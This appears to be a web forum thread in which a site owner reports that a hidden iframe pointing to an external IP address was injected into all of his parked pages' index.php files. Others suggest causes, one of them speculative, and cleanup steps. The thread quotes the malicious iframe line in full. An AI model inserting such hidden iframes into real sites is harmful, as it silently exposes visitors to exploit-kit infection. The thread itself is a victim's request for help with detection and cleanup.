Hello, I have about 70 parked pages on dreamhost server, and somehow all the index.php files were modified to include the following code: <iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe> Code (markup): I dont think this was done manually as it would take a long time to do so, and all the files were modified on the same date at around the same time. Any idea? Thank you
Yeah someone either hacked your parking company and is raping your site's visitors to boost thier alexa ranking and they've likely a javascript or something installed on thier site ads that autoclicks them when a hit from your urls gets there, OR your parking company is stealing from thier advertisers this way. . You just can't see it all but it's likely happening. They're piggybacking your sites traffic to earn revenues on a page of thier own. Either that or they're piggybacking your site's traffic to resell it as a traffic service to others. Where do you have them parked? Seems the parking company is doing this. Very shady practice for a domain parking company. It might appear they're stealing from ad thier feed using this method by sending your traffic not only to your pages but others at the same time and possibly doing what's mentioned above.
This is a common exploit - it usually comes in thru a guessed FTP account or an unpatched piece of open source. I would fix this ASAP as some of these jscript / iframe inserts can install a virus and are now getting blocked / banned by Google. In this case your might be a virus. Google the IP address to confirm. The best way to fix this is in the same way you got the problem, in an automated fashion. I wrote a basic script to check for file modification times and zoomed thru all the sites and then had another script to do the fixes. However you choose to do it - do it fast. -- Steve
yeah.. something similar happened to me about 6 months ago.. best thing to do is to grep search and find all the places ur pages have been hacked.. i've googled that ip address and seems tons of people have been hit also.. http://www.google.es/search?hl=en&q=81.95.149.74&btnG=Google+Search&meta=
This pdf from Panda might be relevant to you: http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/05/11/MPack.pdf